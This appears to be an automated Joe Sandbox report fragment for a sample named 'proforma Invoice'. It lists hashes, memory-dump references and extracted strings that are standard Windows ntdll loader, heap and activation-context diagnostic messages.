                                                                          • Not Executed
                                                                          control_flow_graph 257 11a2c0a-11a2c0f 258 11a2c1f-11a2c26 LdrInitializeThunk 257->258 259 11a2c11-11a2c18 257->259
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 69dd8f69e34a03683319c9da1764143e972d9dfc7e0b8f01cf76706b49f521dc
                                                                          • Instruction ID: 20230cc1418208a8d4fa21f1757f933c1109adc8ff414ac5d610ff303c7928f7
                                                                          • Opcode Fuzzy Hash: 69dd8f69e34a03683319c9da1764143e972d9dfc7e0b8f01cf76706b49f521dc
                                                                          • Instruction Fuzzy Hash: CCB09B719015C5C5DA15E7744B087177D0477D0701F65C061D2031641F4738C1D1E675
                                                                          Strings
                                                                          • a NULL pointer, xrefs: 01218F90
                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01218E3F
                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01218DD3
                                                                          • The instruction at %p tried to %s , xrefs: 01218F66
                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01218F26
                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01218FEF
                                                                          • The resource is owned exclusively by thread %p, xrefs: 01218E24
                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01218DC4
                                                                          • This failed because of error %Ix., xrefs: 01218EF6
                                                                          • *** then kb to get the faulting stack, xrefs: 01218FCC
                                                                          • write to, xrefs: 01218F56
                                                                          • read from, xrefs: 01218F5D, 01218F62
                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01218D8C
                                                                          • *** Inpage error in %ws:%s, xrefs: 01218EC8
                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 01218F3F
                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01218F2D
                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01218E86
                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01218E4B
                                                                          • The critical section is owned by thread %p., xrefs: 01218E69
                                                                          • Go determine why that thread has not released the critical section., xrefs: 01218E75
                                                                          • *** enter .cxr %p for the context, xrefs: 01218FBD
                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01218DB5
                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01218F34
                                                                          • *** enter .exr %p for the exception record, xrefs: 01218FA1
                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 01218E02
                                                                          • The instruction at %p referenced memory at %p., xrefs: 01218EE2
                                                                          • an invalid address, %p, xrefs: 01218F7F
                                                                          • <unknown>, xrefs: 01218D2E, 01218D81, 01218E00, 01218E49, 01218EC7, 01218F3E
                                                                          • The resource is owned shared by %d threads, xrefs: 01218E2E
                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01218DA3
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                          • API String ID: 0-108210295
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2160512332
                                                                          Strings
                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011D54CE
                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011D54E2
                                                                          • Critical section address., xrefs: 011D5502
                                                                          • Critical section debug info address, xrefs: 011D541F, 011D552E
                                                                          • Critical section address, xrefs: 011D5425, 011D54BC, 011D5534
                                                                          • double initialized or corrupted critical section, xrefs: 011D5508
                                                                          • Thread identifier, xrefs: 011D553A
                                                                          • corrupted critical section, xrefs: 011D54C2
                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011D540A, 011D5496, 011D5519
                                                                          • Invalid debug info address of this critical section, xrefs: 011D54B6
                                                                          • Address of the debug info found in the active list., xrefs: 011D54AE, 011D54FA
                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 011D5543
                                                                          • undeleted critical section in freed memory, xrefs: 011D542B
                                                                          • 8, xrefs: 011D52E3
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                          • API String ID: 0-2368682639
                                                                          Strings
                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 011D2498
                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011D24C0
                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 011D2624
                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 011D2602
                                                                          • @, xrefs: 011D259B
                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 011D2409
                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 011D2412
                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011D22E4
                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 011D261F
                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011D25EB
                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 011D2506
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                          • API String ID: 0-4009184096
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                          • API String ID: 0-2515994595
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                          • API String ID: 0-3197712848
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                          • API String ID: 0-1700792311
                                                                          Strings
                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 011E8A3D
                                                                          • AVRF: -*- final list of providers -*- , xrefs: 011E8B8F
                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 011E8A67
                                                                          • VerifierFlags, xrefs: 011E8C50
                                                                          • VerifierDebug, xrefs: 011E8CA5
                                                                          • VerifierDlls, xrefs: 011E8CBD
                                                                          • HandleTraces, xrefs: 011E8C8F
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                          • API String ID: 0-3223716464
                                                                          Strings
                                                                          • LdrpProtectedCopyMemory, xrefs: 011E4DF4
                                                                          • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 011E4DF5
                                                                          • LdrpGenericExceptionFilter, xrefs: 011E4DFC
                                                                          • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 011E4E38
                                                                          • ***Exception thrown within loader***, xrefs: 011E4E27
                                                                          • Execute '.cxr %p' to dump context, xrefs: 011E4EB1
                                                                          • minkernel\ntdll\ldrutil.c, xrefs: 011E4E06
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                          • API String ID: 0-2973941816
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                          • API String ID: 0-1109411897
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-792281065
                                                                          Strings
                                                                          • LdrpInitShimEngine, xrefs: 011B99F4, 011B9A07, 011B9A30
                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 011B9A2A
                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 011B9A01
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011B9A11, 011B9A3A
                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011B99ED
                                                                          • apphelp.dll, xrefs: 01156496
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-204845295
                                                                          Strings
                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 011D219F
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011D21BF
                                                                          • SXS: %s() passed the empty activation context, xrefs: 011D2165
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 011D2178
                                                                          • RtlGetAssemblyStorageRoot, xrefs: 011D2160, 011D219A, 011D21BA
                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 011D2180
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                          • API String ID: 0-861424205
                                                                          Strings
                                                                          • LdrpInitializeProcess, xrefs: 0119C6C4
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0119C6C3
                                                                          • Loading import redirection DLL: '%wZ', xrefs: 011D8170
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 011D8181, 011D81F5
                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 011D81E5
                                                                          • LdrpInitializeImportRedirection, xrefs: 011D8177, 011D81EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 0-475462383
                                                                          APIs
                                                                            • Part of subcall function 011A2DF0: LdrInitializeThunk.NTDLL ref: 011A2DFA
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011A0BA3
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011A0BB6
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011A0D60
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011A0D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 1404860816-0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                          • API String ID: 0-379654539
                                                                          Strings
                                                                          • @, xrefs: 01198591
                                                                          • LdrpInitializeProcess, xrefs: 01198422
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01198421
                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0119855E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1918872054
                                                                          Strings
                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011D21D9, 011D22B1
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011D22B6
                                                                          • SXS: %s() passed the empty activation context, xrefs: 011D21DE
                                                                          • .Local, xrefs: 011928D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                          • API String ID: 0-1239276146
                                                                          Strings
                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 011D342A
                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 011D3456
                                                                          • RtlDeactivateActivationContext, xrefs: 011D3425, 011D3432, 011D3451
                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 011D3437
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                          • API String ID: 0-1245972979
                                                                          Strings
                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011C10AE
                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 011C106B
                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 011C0FE5
                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 011C1028
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                          • API String ID: 0-1468400865
                                                                          Strings
                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 011D3640, 011D366C
                                                                          • LdrpFindDllActivationContext, xrefs: 011D3636, 011D3662
                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 011D362F
                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 011D365C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                          • API String ID: 0-3779518884
                                                                          Strings
                                                                          • LdrpDynamicShimModule, xrefs: 011CA998
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011CA9A2
                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 011CA992
                                                                          • apphelp.dll, xrefs: 01182462
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-176724104
                                                                          Strings
                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0117327D
                                                                          • HEAP: , xrefs: 01173264
                                                                          • HEAP[%wZ]: , xrefs: 01173255
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                          • API String ID: 0-617086771
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-4253913091
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $@
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                          Strings
                                                                          • Failed to allocated memory for shimmed module list, xrefs: 011CA10F
                                                                          • LdrpCheckModule, xrefs: 011CA117
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011CA121
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                          Strings
                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 011D82DE
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011D82E8
                                                                          • Failed to reallocate the system dirs string !, xrefs: 011D82D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                          Strings
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0121C1C5
                                                                          • PreferredUILanguages, xrefs: 0121C212
                                                                          • @, xrefs: 0121C1F1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                          Strings
                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011E4888
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 011E4899
                                                                          • LdrpCheckRedirection, xrefs: 011E488F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                          Strings
                                                                          • LdrpInitializationFailure, xrefs: 011E20FA
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011E2104
                                                                          • Process initialization failed with status 0x%08lx, xrefs: 011E20F3
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: #%u
                                                                          Strings
                                                                          • LdrResSearchResource Enter, xrefs: 0116AA13
                                                                          • LdrResSearchResource Exit, xrefs: 0116AA25
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `$`
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Legacy$UEFI
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$MUI
                                                                          Strings
